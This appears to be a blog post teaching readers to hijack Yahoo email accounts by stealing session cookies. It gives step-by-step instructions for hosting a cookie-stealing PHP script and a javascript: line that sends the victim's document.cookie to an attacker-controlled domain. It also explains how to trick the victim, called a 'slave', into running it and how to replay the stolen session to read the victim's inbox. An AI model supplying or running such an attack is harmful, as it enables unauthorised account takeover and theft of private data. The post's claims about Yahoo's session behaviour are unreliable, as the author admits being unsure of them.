HACK YAHOO ACCOUNT BY STEALING COOKIES (SESSION HIJACKING)
Author : CR@SH n Burn
I am gonna tell you how to hack any yahoo account by stealing cookies or we can say stealing session IDs.
First of all I want to tell you the basics of the cookies.
What are session cookies or session IDs?
Whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. Session cookies enable the website you are visiting to keep track of your movement from page to page so you don't get asked for the same information you've already given to the site. Cookies allow you to proceed through many pages of a site quickly and easily without having to authenticate or reprocess each new area you visit. This piece of string or login session is destroyed when we click on 'Sign Out' option.
Just visit yahoo.com. Type in browser
Code:
javascript:alert(document.cookie);
You would get a pop up box showing you the cookies left by yahoo on our PC.
Now login to your account and do same thing, you would see some more elements added to the cookies. These represent sessions ids.
So it means sessions are stored in our browser in form of cookies.
An attacker can steal that session by convincing slave to run a piece of code in browser. Attacker can use that stolen session to login into slave's account without providing any username/password. This attack is very uncommon because when the slave clicks 'Sign out', session gets destroyed and attacker too also gets signed out.
But in case of yahoo, it’s not the same. The attacker doesn’t get signed out when slave clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions again for next 24 hrs. This means, once the yahoo account session is stolen, attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.
Download the required script from here:
Steps for stealing session cookies:
1. Sign Up for an account at any free web hosting site.
I have chosen my3gb.com.
2. Now login to your account and go to file manager.
3. Now upload the four files that you have just downloaded. And also make a new directory named 'cookies' here.
4. Now give this code to slave to run in his browser when he would be logged in to his yahoo account.
Code:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
Quote:Here is Yahoo.php basically a cookie stealing script and hacked.php executes the stolen cookies in browser.Stolen cookies get stored in directory 'cookies'
When the slave runs the code in his browser, he would again redirect to his yahoo account.
5. Now open the hacked.php.
Url would be: http://yourdomain.com/hacked.php
And enter the password (Default password is CR@5H n BURN)
Now you must have got the username of slave's account. Simply Click on it and it would take you to inbox of slave's yahoo account without asking for any password.
Now it doesn't matter if slave signs out from his account, you would remain logged into it.
Note: You can try this attack by using two browsers. Sign in into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.
Thanks
Credit goes to M. Makker
You can download the written guide from here(PDF):
No comments:
Post a Comment